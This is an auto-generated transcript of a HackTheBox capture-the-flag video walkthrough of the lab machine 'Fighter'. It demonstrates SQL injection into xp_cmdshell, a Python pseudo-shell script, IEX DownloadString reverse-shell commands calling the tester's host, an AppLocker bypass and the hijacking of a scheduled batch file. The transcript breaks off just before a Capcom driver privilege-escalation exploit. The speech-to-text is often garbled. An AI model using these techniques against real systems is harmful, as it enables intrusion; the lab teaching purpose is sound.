HackTheBox - Fighter
Key Takeaways
The video demonstrates a penetration test of the HackTheBox machine Fighter, a Windows 2008 R2 or 2012 R2 server, using tools such as nmap, GoBuster, and Burp Suite; it exploits a SQL injection vulnerability to gain remote code execution and then elevates privileges.
Full Transcript
what's going on YouTube this is IPSec and this is probably gonna be one of the more complex and difficult videos I've done because the Box we're doing is fighter which is really difficult it took me the better part of three or four days when this box was initially released to do it and when you explain it it doesn't sound that hood you essentially do a bunch of fuzzing on a web server find a old wing that is SQL injectable run code get PowerShell and then eventually escalate up to route with a Capcom exploit and then do some easy reversing on a binary to get the flag sounds easy but there's a bunch of things in the way like in our virus app Locker etc that just slow you down and not to mention the SQL injection is ridiculously tough to do because it requires creating your own script I don't think any like open source tools will just automatically do it because it's set up in a slightly different way to make it difficult so let's just jump in the first thing we're going to do is and map the box so and map - SC for default scripts SVO enumerate versions Oh a output all formats putting the a map directory and call it fighter then the IP address which is 10 10 10 72 just takes some time to run so I've already run it looking at the results we see only one port is open that is I is on port 80 and it's version 8.5 so this is Windows 2008 r2 you'd be just Google like Windows is versions Google should really tell you exactly what goes to it if we clicked all more rows we'd see eight five is windows oh oh it must be windows 2012 or - not 2008 that's odd I thought was the 2008 box but maybe 2012 so version of Windows unknown yet probably going to be 2012 r2 but the only way to really find out is to shell the box so let's do that by going to 10 10 10 72 and we just see Street Fighter Club website it looks like all these links go just to the anchor hashtag of pound whatever you want to call this but they're all dead links looking at the very first and now we see they're 
currently redesigning the website Street Fighter Club HDB so we know what the server name probably is we can go and edit our host file to add that so at C host and then Tenten 1072 Street Fighter Club htb and if we keep reading it says their old member site is still available for registered members but makes us go find the link so let's start doing that let's check robots.txt we get a 404 not found so let us start up go Buster and I am now on go Buster 2.0 because I updated Kali so you may want to do the same but we're not using any of the new functionality so we're list user share wordless doorbuster and directory list 2.3 medium text - you four URL we're going to do Street Fighter Club htb and - OH - specify the outfile go Buster - route vlog and I'm using the domain name is to have IP because generally web servers like having a host name so we do see multiple hits for images that's a 301 redirect and the reason is windows isn't case sensitive so these are all the same thing if we go to slash images it redirects us to putting a slash on the end and for three's us I'm gonna try like WP dash admin while that goes to see if was a wordpress site long shot but sometimes you just take those while go Buster is running I'm going to try to brute-force subdomains as well and to do that I'm gonna use a tool called W fuzz and we're gonna specify - W for word list user share for list I'm gonna use actually SEC list if you don't have this you can just apt install it it's in the Kali repo then discovery DNS and we're going to try let's do subdomains out of the top million would do 5,000 of them then - you I'm gonna do Street Fighter Club htb and the reason why we're not doing fuzz here is none of these subdomains for a Street Fighter club dot HT b were resolved it's just going to my verizon sandbox because I'm using Verizon's DNS servers but anyways since these dns names don't actually resolve we want to specify the I think host header field and that's - HR the lowercase or 
uppercase think uppercase h-help is lowercase uppercase H is to specify a header so - uppercase H fuzz dot Street Fighter club HT b if you haven't figured it out W fuzz when have you have a capital fuzz and that's what puts the item in the word list I did not like that what do we have where's the error wrong header Oh host : and let's see let us hide characters that's - H H it would be - HC to hide characters but code is - HC cell HH special would just hide words any page with 717 words on it just ignore and we get members comes back right away that has 92 words so let us go into our I should have killed that but that's the one I'm just killed it so some of the resources on my VM frees up so it's not going slow going to Etsy host let's do members dot Street Fighter Club HT be and we can try it in Firefox see what happens we do get a 4:3 so let's go back to go Buster kill this and now we want to try brute force saying members dot Street Fighter Club htb and go Buster or do sub-domain members at / old redirects us so let's see what is at / old access denied so it looks like now we have to brute-force a login page or another page within / old a lot of brute-forcing right now going on so let us find a good word list going back into cyclists let's do discovery web content Sony logins dot flood text let's try that so copy this URL and we will go Buster - W - you is gonna be members Street Fighter Club HT b / old and then we want to specify - / out file go Buster login old I guess dot text try this and right away we get login ASP comes back with two hundred so let's try old login dot ASP welcome to the members area finally we have made it here so let's just try like admin admin and nothing so let's switch over to huh so we can intercept this request intercept is on try let's see see what this does so we did change login type and check to remember me click go go back into burp just send this a repeater forward along and then we'll try it with those unchecked and then and 
then send this send this repeater so all we're doing is comparing two requests so we have username admin password admin walking type equals two and this was with user so login type 2 is probably user b1 equals login let's check this one we have admin admin long and type one remember me as on and b1 is login so if we click go and click go here let's see don't really notice a big difference between these two requests change log and type tou1 and nope don't really notice anything both the time we're telling us to set cookies and just saying the object moved so in let's follow redirection on both of them I'm trying to find out what the difference between the two requests is so it's saying it moved again and it moved again so 2017 bytes on that one 2017 bytes on this one looks like they're relatively the same but because this one has just more options I'm always going to do the one with remember me that's unset that let's try admin admin click remember me send this droid Peter and we can close that one and let's just fuzz this so admin plus or one equals one nothing there let's try login type is equal to three nothing there put junk and login type and we get a error of five hundred let's put a SQL comment which is - - and then a space I always do the second - just so you know there's a space and we get a 301 so if we put random junk after the comment and then before the comment and we get another error message so we can be relatively certain that it processed this comment so let's try 3 or 1 equals 1 click go and if you're really paying attention you'll see that an email comes back if we change this to a false statement no email have you just tried this you get no email so through a boolean injection we have changed this to say hey if 1 equals 1 it's a valid login let us in and it returns something back in the email so let us go to the decoder tab decode the URL encoding then on base 64 this and we'll get the email but more importantly let's just follow the redirection 
and then we get an error service is not available but I'm looking at level 1 see what level is so decoder smart decode negative 1 so let's try changing level 2 I don't know one and not negative one repeater one pausing the level level 2 level 3 so I'm guessing level is probably going to be user or admin and I'm just playing with this to see if service ever becomes available and we probably have to be 64 encode this since everything else is so go to tab encode be 64 and then we probably want to encode as a URL go back to repeater and what level is put this in and we always get service is not available so we can assume this page is down but we got a SQL injection so let's go back and where SQL request is and try getting figure adding getting information from this database so let's try a union select one error message to here 3 4 5 6 and we get it valid here so let's see what this email is go to decoder 5 smart decode then decode base64 5 so anything we place here please subscribe we have two he will encode that now close out the quotes let's try different quotes don't like double quotes for whatever reason we placed a string and filled five if we decode this we get that string so let's try figuring out what type of database this is at version a sequel command got a bunch of information here go back to the coda tab smart echo decode as base 64 and we have Microsoft sequel server 2014 Express edition so we know this is a Microsoft sequel server Microsoft sequel is normally vulnerable to stacked queries generally I went to like net sparker SQL injection cheat sheet and this is a relatively decent reference so if we go to this URL they have tons of information but when stacked queries work and we have ASP SQL Server green showing it does work so let's see exactly what that is we go back to repeater we can do like select one and the query works if that select statement is not valid we can air message so we can actually chain multiple SQL queries which is going to be handy 
because that will allow us to do things like an able XP CMD shell if we wanted to we could probably test if XP CMD shell was enabled let's see test XP CMD shell an able check query maybe that's it let's see this may work so if we do long and tight and then Union select one two three four piece this will see if it works I'm just making all these double spaces a single space and showing there's no like tabs in this query does these spaces looked odd to me just from eyeballing it okay maybe this will work maybe it won't maybe it will maybe it won't copy that paste it in field five add a field six and we will highlight this press control you to URL encode it click go and we get an error message let's see good to put this in double quotes was it single quotes didn't like a double quotes it didn't like still an error message C can incur that anymore let's make sure we didn't have any errors here so on your land code this select convert in is normal value values config value huh and it looks correct let's see and look at this one more time and then we'll just move on and assume it's not enable because I don't think it's enabled by default and you normally have to enable it with the stacked query so let's see maybe it doesn't like this semicolon here because it could be like viewed as a stack query so let's you know one code it click go let's remove this set 3 B click go and we notice something different and the header so we have that semicolon there it only gives us check back without it we get level pass for a name so we just we know we did something because we made it further than script because the script is now giving us more output generally more means you made it further than the code so let's try putting this in double quotes to see if it likes double quotes instead no it does not so move that go back we're still getting an error message so let's just try one last thing and change the case on this just in case it has a bad blacklist blocking xB CMD shell that is 
all lowercase and it looks like it does because now we take an error message and we get email back so if we smoke decode decode base64 we get one which I believe means XP CMD shell is enabled and we want to run the commands to enable it just in case because I don't think it's supposed to be enabled by default maybe it is maybe it isn't but we will run those commands to enable it so this window can be called check enabled I guess and would always have that saved so the next thing we do is we want to configure a stacked query to enable xp CMD shell so to do that let us just run a different command and as I did that I realized I just over wrote the window I tried to save checking of its enable is not important so we'll just disregard that for the rest of the video and we'll have enable RCE as this tab but the command to do this is let's see we want to execute SP configure show Advanced Options set that to 1 then we want to exec SP configure xp CMD shell and set that to 1 then we just want to reconfigure so let's see exec SP configure show Advanced Options 1 exec XP SP configure yeah that XP CMD show 1 that should be good click go object is moved so we have now just enabled the XP CMD shell it was already enabled but we did it again for good measure I'm not sure if you'll have to or not I'm not sure why it was the next thing we do is now run commands so run command and we can just simply do exec SP was not exactly XP CMD shell Who am I sorry this this error it does not we don't get any output we can try like paying one 27001 and I was just saying if it would take longer to come back so I'm not sure if this is threaded or not and what I mean by is when I run this paying I'm not sure if the request is going to wait for all these to come back before it responds with a webpage what I do know is it likes double quotes not single quotes that it definitely likes so let's see let's try creating a table and then outputting the results of XP C and B shell in a table so we can do 
create table if SEC and then we want to say the columns output and remember the syntax for this my apologies think I'll put verkehr 9001 maybe it's probably will error out yeah so let's do a nice SQL create table C create table employees d-nut all lost name so almost same print see try this see let's undo all and code this so I can see what all their special characters are great table if SEC output verkehr 9001 great table employees first-name verkehr 50 should work let's try this again go until error see let's just try shrinking for a care maybe you don't always want to be above 9000 so won't try 1024 that sounds like easy to visible number for ver care that's relatively small try that and there we go so knows the issue when you just add it being too big so now we should be able to insert XP command inject into this table so we can do that let's see I was still in wrong command so let's rename this to create table create a new one and run command so let's see we want to do insert into hip sack output and we want to insert the contents of XP CMD show and then we'll do good way by okay you're all encode this click go looks like it ran and now let's get the output so remember we have to do a union injection to get stuff out of the database so 3 Union select 1 2 3 4 5 6 comment for good measure I don't think we have to do these comments but whenever i SQ I'll inject and add things I normally put a comment at the end so we want to do select top one from output where output is not null there we go click go and that did not work go ahead specify if sector output nope let's see let's get rid of this and dumb it down so select can we do count start from output no it does not like that go after you I'll encode any of this no I do not let's see-oh select count output from hip sack and there we go so we have decode smart to code code as a 64 one because we ran a command we have one line of output so that's exactly what we would expect so we select output from MIPS ik select 
top one output there we go I always do top one when I'm doing this just to grab one line without that it's grabbing multiple lines and that is bad page 64 we have fighter / SQL serve so now we can do let's another command let's try like go back to our own command and dry IP config IP config click go get the output and what kind of stuck because it's still giving us the same exact output as before which was the email and try like order by descending click go did not like that ascending click go do not like that at all but we have to create like a auto incrementing primary key so we can easily pick which entries to do because if we look we do that count again count output we have multiple lines to go through and this is looking a bit bigger so decode this base64 we know have 10 lines in this we only ran two commands and the reason is it's taking every line and that ipconfig and inserting it into the database so let us drop it sec so if we see a new one let's just we have to do the stack query drop tables if sec I don't have its table at tables table probably makes sense there we go so we drop dip sec and we can go back to the create and now we want to create one with a primary key whoops w elenco to that my bad so we do ID is an integer the identity is going to be one for the scene start at one increment by one and we call this primary key put a comma and hope I just did that correctly click go looks good if we run ipconfig that looks good get output count oq let's just change this oq decode a 64 pi needs to equals 9 so we have 9 lines of output so we can do select output from if SEC where ID is equal to 1 see if that works well we don't like count there's my select output where ID is equal to 2 there we go so maybe one was null it just couldn't be viewed decode this and we get Windows IP configuration so if we increment this to 3 or probably get the next line doesn't like that try for doesn't like that 5 there we go we got one so very temperamental but looks like 
we're getting that Ethernet adapter Ethernet 0 so this is gonna be painful to do manually keep doing it manually so let us go and create a script to do this because I think we have everything we need to create a script so let's go back and we will make SQL inject and we will V notes I want to do notes on this side and V and Jack PI on this side this way over because this script is going to get a little confusing if we don't lay it out correctly so let us begin typing what we want to do the very first piece being what modules we want to load so let's see to execute the exploit we need to make a post request so we want through a quest module to make post then what else do we need well we need to be able to read the cookie because that's where the output is and that will require base64 specifically be 64 decode to read the cookie and then also will need a way to undo URL encoding and that can be done in your lib parse unquote so there's the probably the modules will need the very first thing we wanted our script to do is enable RCE mode and this will do enable xp CMD shell this rule only requires us to make a post request we want to create a table so we can store our output and this is going to require a post request as well the next thing we want a script to be able to do is well run commands so we need a way to run XP CMD shell and that's going to require post and this inserts multiple rows as a note to us we also probably should in truncate the table every time we run a command we didn't show that in book but if we're going to like loop through the table and echo everything in the table we need to erase the table as we run it or will show previous command history or we have to keep track of where we left off in the table and no one wants to do that so that will require a post as well and I'm actually going to move this above XP CMD shell because we want to do it before you run a command then let's see we got to get out put some hell so get output and that's going 
to require us to get the number of rows and that requires post and it's also going to require standard out or something to read that cookie because we actually are interacting with the server and then we want to print each line and that's also going to require a post and STD el and STD out I guess we can define that to be the email cookie and that does a URL in code and then a b64 in code so that's essentially our script and those are the things we have to keep in mind so string it to models I'm going to import requests because we know we need that gonna import Base 6000 do from base64 import be 64 decode from URL Lib purse import unquote and now we want to create a class to stay organized and when this initializes we want to set proxies is equal to one 27001 8080 and the only reason I'm doing that is we're probably going to do a lot of debugging or maybe you won't but this allows us to do debugging because it's going to put our script through a proxy in the future so self dot URL we're going to declare that to be HTTP members dot Street Fighter club HT b / old we're posting to verify dot asp now self proxies is equal to http or do this in single quotes proxies now we have to start creating all the SQL injections so self can able XP shell is equal to one and let's copy this Mabel RCE paste that and then we'll do I think we want space there I don't know if it matters okay [Music] for posterity will capitalize that okay why don't our o go back okay that's weird let's just print self dot an able XP shelled I do that correctly and we'll call this o for object I guess is equal to fighter by its on three and jacked up pie and I guess it works if it likes a lot of white space I wonder that's gonna screw us up if it does we can always fix it but I think for code readability sake right now I like that so next thing we want to do is let's see we just did XP CMD shell so we have to create table so self dot create table is equal to its another stacked query do I have it here 
create table on your Ln quote copy paste and we'll do create table if sac that there that there and that that looks good next thing we want to do is self dot I guess we can truncate the table real quick and I haven't showed that command but it's relatively straightforward at truncate table hip sack it's easy so let's do self dot can we get command I think that may be it for all we can statically display so let's go through this we got XP CMD shell we got table I got truncate come and I don't want to do this way because it requires us to do dynamic output so we'll do that later so number of rows it will require a dynamic output or dynamic when I say dynamic out but I mean dynamic input because we're actually changing something this all here is completely static so that should be good for the initialization of this class so we can now create other functions so the very first thing we have to do is a function to make a request because posting is quite a common thing we have to do so def make requests a definition make requests itself and then every request is going to do something and we'll call that we'll call that action and all that's gonna do is return request post self dot URL which is going to be member Street Fighter club whatever proxies is equal to self dot proxies we don't want redirects because every time it does this we're doing object moves and we don't want to follow that all we want is to get that cookie immediately let's see the data can be username admin password please subscribe login type this will be action because that's where the inject is and then remember May at that on and the last one is b1 b1 is set to login okay that looks good I think I forgot a single quote somewhere because I don't remember this being read before we started that's coming out this yeah that was white so we screwed something up let's see user admin password please right here is where it starts going white what says on there we go so the next thing we want to do is probably 
run commands we just can make a request so yeah let's code the wrong command piece CMD and we're just going down so enables RCE mood almost all done all the injects are there we just have to make the requests actually let's do that on the initialization let's do setting X boy and we can just do self make request cell and the action is going to be self dot enable XP shell and the next one is going to be self dot create table okay this done it should be able to close that one all l so run CMD very first thing we do is truncate the table according to this so self dot make request self truncate table okay then the next thing we do is self dot make requests and I don't know what exactly what that F means but it makes these a lot more readable and Python three because I can specify commands that way instead of doing like that percent s and then percent at the end or dot format I can just put the command I want in its weekly brackets so there's gonna be one insert into if SEC output exec XP CMD shell and then single quote CMD single quote I think that's good and because we're putting X P CMD shell in single quotes I'm also going to do CMD is equal to CM d dot replace single quote with double single quotes so this way and for a command that we're running has a single quote it's kind of put two single quotes which is kind of like the escape for a single quote and just puts a single quote if that makes sense hopefully it does and now we need a way to get output because the command is ran so let's do def get output actually output is gonna require us to read cookies so let's do def decode cookies self cookies and we'll return be 64 decode unquote to undo HTML encoding cookies email okay so now we can carry an output function so def get output on self and we're almost done so we're actually going to get through the post request back so I'm going R equals self make request self dot whoo we don't have something to get the count so we'll call this get index and we have to create 
a new query here to get the number of rows so self dot get index is equal to 1 what is that Union select 1 2 3 4 5 6 and then we can do a comment for good measure and this was select will do top 1 ID from hips ik so that's going to select I think the very last row if it doesn't now we can put it order by descending what so output should now be able to get the number of lines so we can do count is equal to int because this needs to be a integer self decode cookies and r dot cookies so there's gonna be the whole request and this is only going to send the cookies the cookies piece so now I should be able to do 4x and range of 1 to count because it's going to be the max line is equal to self dot make request then f1 Union select one two three four five six and that okay and in five we need to select top one output from ape SEC where I D is equal to X and then we end that nested query yeah I think when you run a query within a query it's called nested when you run it outside its stacked if you're wanting about terminology I'm using and then we'll try output is equal to self decode cookie blind dot cookies so line is the whole request again just like when we did count and I'm sending the cookies piece to decode cookies and then when we do print output decode and if we fail do nothing so now on run command we can now specify we want to self get output and we can finally do the last piece which is run this so while true we do please work is equal to input shell and then run CMD please work I think that's it because this will kick off run CMD which will insert a stuff into the table and that's gonna kick off get output automatically which is going to try to print out the results there's no way this works but it's worth a shot Python 3 inject app I make requests to arguments but three were given line 22 self dot make request what inject why would three given that should just be one self dot enable XP shell if we put this to one line I do that incorrectly that going to move 
the error do not move the error print self dot an able XP shell one exact that looks good what is going on here there's a stupid mistake somewhere does it happen on all of them the next one yeah run CMD is not find 53 Oh dot run CMD doesn't look like this works at all simply going for Oh intercepts on history so let's see who am i we can see the response object moved and email let's see I should put something in like the header of the request that said where each piece was so we're starting at 13 let's run Who am I does 14 this is the truncate table that did not error and sit into Apes ACK Who am I that's good now let's see what this says it's like one two three four top one ID from apes ACK if we run this look at email we probably get one ok so then it does let's see Fred Cal do i do 4x and range 0 Cal see if my decode cookies is working Who am I one okay see mine is equal to select top one output from if sec I don't remember seeing that command select one that's top one ID so let's see I put this in 0 2 count Who am I let's do count plus one top one output from ape SEC that's looking better let's see what this says so select top one output from apes ACK where ID is equal to one click go make it email and this should be decode base64 fight or SQL serve so that is correct I think we have an error and this cookie thing and I only had decode cookie not decode cookies Who am I there we go IP config didn't work for that Who am I IP config doesn't work for multi-line that is bizarre whoever might work Stella Lee let's do system version dir so it's not incrementing so let's see right count Python 3 Who am I is one-line IP config is one line that shouldn't be the case that should be 9 so get indexes crew table select top 1 ID from hip SEC and go figure this is the one we didn't do invert so let's see what this looks like repeater paste nope this was well just type it because VI is going in visual mode and doesn't want to copy to my real clipboard so select top 1 ID from 
ape SEC 1 Union select 1 2 3 4 5 6 select top 1 ID from hip SEC it's probably capital Oh always takes longer for the video that does to actually do it click go and that's just one right it didn't actually do what we thought it would do with that IP config so run CMD that is bizarre go to burp proxy we need to actually just filter for IP config C and a repeater run command so we have the output there let's send this one and see what we did differently between these two okay well this has cookies in it we don't need let's just actually copy well one that works down here and put the injector on its own line it's going to be some silly mistake control shift deal control shift key Oh insert into if sec output we have double quotes here and single quotes here does that actually change the output that much so if we run this we'll probably be at ten to one we want ID not output ID from ape SEC and we don't need where IDs so select top one ID from ape SEC click go and this is still just one let's see if we order by descending did not like that I think what a byte is one word did not like that order by ID descending there we go I think that's it the one we didn't test fully is the one that gave us the most issues spot decode 3d decode as base64 six so let us change command truncate table get index and this will be order by ID descending ipconfig there we go that's what I expected so I was just grabbing the well it was doing exactly what it said it was grabbing the top row from ID which is always going to be one because that's the very top by order by descending order it's going to grab the bottom and what if I need that count plus one now let's see P config there we go that is looking much better so I still wonder why this Airedale self create table make requests takes two positional arguments but three were given oh crap that there we go Who am I works and now let's see IP config system info let's good take a little while to run but now we have a actual working SQL shell 
Sorry that took so long to get working, but we answered the question we had at like minute 1, and it's 2012 R2, so the IIS version does not lie; apparently my memory does. But we have completed all these tasks: I got output and we got standard out. So essentially the program: we define a bunch of SQL injections, we set up the server so we can enable xp_cmdshell and create the table where we output our input... our standard out, I guess that's the best way to do it. We create a function so we don't have to put this data cookie a bunch of times, so we just create a wrapper around making a POST request. Then we issue an xp_cmdshell command and insert into the table we had created, and after that runs we do get_output, which then grabs the number of rows we have, then loops through and prints every single line. And it can do that because the very first thing we do in run_cmd is truncate the table, which means erase the table. So that is that piece. We are almost to the user shell, but this is where the box starts getting fun, so hopefully you enjoyed coding this pseudo shell. We can begin doing the box now. Sure, I'll save this. Except that actually there was one last thing I wanted to do, and that is make sure that script works after a reboot. So I reverted the box and we're gonna try running the script again. I do whoami; it actually did not work. So some of our "get the box ready for exploit" doesn't work in the script. So what I'm gonna do is go into Burp, go into HTTP history and see what we send. So this is the get_output command, we got a 500 error. This is xp_cmdshell, it actually runs, so that's odd. If we keep going down, this is the truncate table, that says it ran. Create table, we get a 500 error, and then this is setting up xp_cmdshell to be enabled, and that runs. So this create table, that's a little worrisome. Did it fail because the table wasn't created to begin with, or is there an actual error in this SQL? If we look at this we can see it doesn't end with a parenthesis, so going
back to inject.py where it's a bit easier to read. Good, we open it up here and never close it, so let's put a last parenthesis to close it. Run this, whoami, and there we go, now the script is working and we can jump into trying to pop this box. And there are two ways to do this. I'm gonna do it the intended way first and then the second way I'm going to do it the unintended way, I guess we can say. Um, first thing I do is whoami /priv and we see we have the SeImpersonatePrivilege and it's enabled, and this is going into the unintended way with Juicy Potato. Juicy Potato has to be used because BITS is blocked, which prevents Rotten Potato and all the previous ones from working; you just specify a different CLSID. That doesn't make sense; hopefully it will when we get to this box. So the first thing I want to do is try to get away from this pseudo shell and get a real shell, because I hate not having like a current working directory and hate having to specify full paths every time. So when I do powershell whoami I get access is denied. So if you remember there are two versions of PowerShell, a 64-bit and a 32-bit. When I just type powershell I think it's going to C:\Windows\SysNative or System32, it's going to one of those, and that is the 64-bit location. If we specify C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell whoami, this one actually runs; this is the 32-bit version. So when I was trying to run PowerShell and getting access denied I'm like, OK, AppLocker is on the box or something is configured to prevent PowerShell. OK, let's try the other version, because maybe they just blacklisted the 64-bit version if they specified the path weird or something, and it looks like that's what happened, because the 32-bit works. So let us get a reverse shell with this. So if we do C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell then we can do IEX (New-Object Net.WebClient).DownloadString('http://10.10.14... I
think I'm 3. ifconfig tun0, yes I am 3. Then clean.ps1... I will do rev.ps1, name really doesn't matter. So we have to make that file exist. mkdir www, cd www, and then we'll copy /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 to rev.ps1. Then when we edit this we want to take this example and invoke it as soon as it runs, just to save us running a command. So 10.10.14.3, port will do 443. nc -lvnp 443, run this. Doesn't look like it ran, so let's see: unable to connect to the remote server. Oh, of course, cd www, python SimpleHTTPServer 80, and we now can run this. Remote server returned 404 Not Found, because this is expecting all caps, so we can move to rev.ps1, run this one last time, and we get a connect back. So if we do whoami we are still fighter\sqlserv and, um, we're in the 32-bit version of PowerShell. So our next task is trying to escape this. So I'm going to go into the decoder user's folder; I made a typo, cd users\decoder, do a dir here and we see there is a clean.bat. The reason I was going in here is because this is where user.txt is, and we get access to path denied, but seeing clean.bat... if we look we see a command to remove C:\users\decoder\AppData\local\temp, so it's removing his temp directory. If we look at AppData\local we don't have permission, so we just have to go on a hunch that this is the next step of the box. If you didn't want to go this route there are plenty of like AppLocker bypasses using PowerLessShell and MSBuild to run payloads, and maybe we'll do that at the end of the video, but that's not the AppLocker bypass I plan on using for the unintended method. So we're gonna keep going with the intended method and notice that clean.bat has an A, so it's append only; we don't have write access, we can't erase the file. So if we just do like echo test > clean.bat, immediately access to path is denied. If we do echo test >> clean.bat, it writes and we can view the file
and see that we did it. The issue is there is an exit, so that sucks, because if there's an exit all this stuff below it won't run. We can, however, truncate with append permissions. So if we do [System.IO.File]::Open('C:\users\decoder\clean.bat', [System.IO.FileMode]::Truncate) we can now see we have erased the file, and I guess I may have something weird where I didn't close the file. Weird, I don't know how to fix that. Exit the shell and run it again, maybe that will fix it. cd users\decoder, type clean.bat, OK, now that file isn't being held open, so I can view it and it's empty. So the next step is to do the powershell -nop -c IEX... am I doing this correct? Yeah, C:\users\decoder\clean.bat. Notice I did a single quote twice, because that's how you do a single quote when going too fast... powershell (New-Object Net.WebClient).DownloadString, now I can do the double single quote because we already have a single quote back here, so double single quote to escape that, essentially, and 10.10.14.3, we called it rev, we'll do rev-445.ps1. Think that is all good, right? Actually, the command looks good, so let's try echoing this into clean.bat. clean.bat, let's copy; we have to go into www, copy rev.ps1 to rev-445.
ps1, edit this, go to the bottom, change the port. nc -lvnp 445, and here we wait, and if we do it correctly we'll get a callback on our web server; if not, then we have to try again and see what we did wrong. So it's been a while and we never got a callback, so let's just bring this file back to our box and see if we added any weird bytes to it, because if we just view it with type clean.bat everything looks fine. So let's see if there's anything hidden in it. In order to do that we have to convert it to base64, so we'll do $text = Get-Content clean.bat. If we look at $text we got that, so we can do $bytes = [System.Text.Encoding]::Unicode.GetBytes($text), then $encodedText = [Convert]::ToBase64String($bytes), and $encodedText... let's see, we Write-Host $encodedText. See, how do we display the actual text? This one's new. Did I do something wrong? ToBase64String($bytes), and $bytes has text in it, huh. Let's just try a different way to encode this, because I'm pretty sure that $encodedText should just give me text, and I don't see any property here that would be relevant to what we want. So we do... yeah, we can do certutil -encode clean.bat and we can specify a place we can write to: C:\users\sqlserv, as a username, and we'll just write to test. So if we use type we probably can view this file. There we go, copy this string, go onto fighter, vi clean.bat.b64, paste the string, base64 -d > clean.bat, and everything looks fine. If we do xxd we can see there is junk before powershell. So it's putting... I don't know what byte that is, but it's certainly not what we want. So we could try doing like iconv -f ascii -t utf-16 and specify clean.bat. Does that do it? Illegal input sequence at position zero. I'm thinking there's something bad with that byte, so maybe it was the truncate or something, but something had screwed with the text file. So let us try a copy /Y, so we always answer yes, NUL; we're copying nothing to clean.bat. A positional parameter
cannot be found that accepts argument. cmd /c, and we'll try this way: copy /Y NUL clean.bat. There we go, so that's another way to clean it, and it's zero in length. So if we did that PowerShell trick again, or echo trick again, to write to clean.bat we're having an issue, but we found out we can just use copy to overwrite this file. So let us use certutil to put a file on the box and then copy it over top of it. So let's go back here, go in www, we can vi, we'll call it launcher.ps1, and what we want is powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/rev-445.ps1'). cat this file, reread it, make sure it looks good. Does look good, and we can use certutil to also drop files on this. So certutil -urlcache -split -f http://10.10.14.3/launcher.ps1 and we want to drop it to C:\users\sqlserv\launcher.ps1. Access is denied, so let's try getting rid of the extension, because of I guess AppLocker or something, and now it completed. So let's copy... cmd.exe to get out of PowerShell, /c copy /Y, always answer yes, launcher to clean.bat. We'll have to specify the whole file path, users\decoder\clean.bat. Access is denied. cmd.exe /c... I guess when you copied NUL to a file it, um, truncated it instead, I don't know. Let's try type, so if we type this file to print it out and then redirect that output to C:\users\decoder\clean.bat, do a dir, it looks like it worked and it's a hundred eighty six in length and not the two hundred something it was before, so it's looking better. And we just... is that from now? 38:16, 38:25, it may have already started grabbing it. We may hit that minute like perfectly. No, that... oh no, it would be getting 445. This is certutil, so certutil just grabs it multiple times I guess, that's odd. So we're just now waiting to see if it now will call back, hit this and then we'll get a shell, hopefully. So let the waiting continue. And it's been a while and we
still haven't got a shell, so let us try something a little bit different and just look at how long the launcher file is. So dir: launcher is 91 and clean.bat is a hundred and eighty six. So we got some weirdness going on. I'm guessing it's the whole PowerShell likes UTF-16, I think it is. So let's copy /Y NUL to C:\users\decoder\clean.bat. cmd.exe /c copy /Y NUL C:\users\decoder\clean.bat. Access is denied, awesome, let's try it again. So let's copy... maybe we hit it when the computer was accessing it. Access denied still. Exit. Let's go back to the SQL server, python3 inject, let's get another shell, and I'm not listening... there we go, and we can try that copy again, because maybe a command prompt had it open. So cmd /c copy /Y NUL C:\users\decoder\clean.bat, there we go. So it looks like we just had the file open somehow. C:\users\decoder, OK, it's empty. So, we look at the last time we did the redirecting to file, we let PowerShell handle it. So let's do it all within that cmd.exe to see if it doesn't go to UTF-16 format; I'm guessing that's what's happening. clean.bat, try it this way. Yeah, 91, 91 bytes, that looks a little bit better. I think we may finally have this, so let's give it some time and see if it will give us a callback. We can just type it to make sure it is still what we think it is, and it is. We get a callback to rev-445 and we don't get a shell, so either decoder is also prevented from running 64-bit PowerShell, or there's a firewall blocking 445. So what I'm going to do is let's go into the www directory, go into inject, cd .., www, go into launcher, and we're just going to call rev.ps1 and wait. So rev.ps1 is going on port 443, which we know can go out of the firewall, so I'm just doing this to eliminate the possibility of that being the issue. And I'm not sure why it just called rev-445 again; it should have called rev.ps1. cat launcher: DownloadString rev...
Crap, I know what just happened: we only edited launcher and never copied it to clean.bat. So let's move rev-445 and be lazy and just change this to port 443, and now we'll wait on the next callback to see if anything happens. So we have another shell, so let's see if it's 64-bit, and the reason I keep harping on this is because it's technically in a sandbox if it's 32-bit and some things just don't work as expected. So if we do [Environment]::Is64BitProcess it returns True, so we know we are in a 64-bit version of PowerShell. The next thing to do, and this is a big leap, but because of all the Street Fighter references I remember there being like a Capcom driver bug that people called a rootkit. So I'm going to look at the drivers installed; I'm gonna do a command called driverquery and we're going to see if the Capcom driver is installed. So going up and... we stopped right on it, so the Capcom module is installed. So this should be a good breadcrumb. I'm not gonna go into the process because there are already too many good videos that are over an hour long just going on this. My favorite is FuzzySecurity's Capcom, let's see, this is by b33f of FuzzySecurity. He has a lot of good videos going over his process of hacking this, and if you like that video go over to his Patreon, and if you subscribe he does maybe a video... I forget the frequency of his videos, but all his videos are really good, so definitely you want to become a patron to him if you like the videos here. And it's not too advanced; if this is too advanced for you, you may want to do some learning before you start giving money for the videos, because it doesn't assume zero-level knowledge, it assumes you have some knowledge and some coding. But I highly recommend reading this blog post thoroughly and watching the videos, and if you like the videos, subscribing to them. Enough of that, let's just pop this. So if we just do GitHub... there is a link to GitHub here, Capcom-Rootkit is available on GitHub, awesome. So let's clone this and
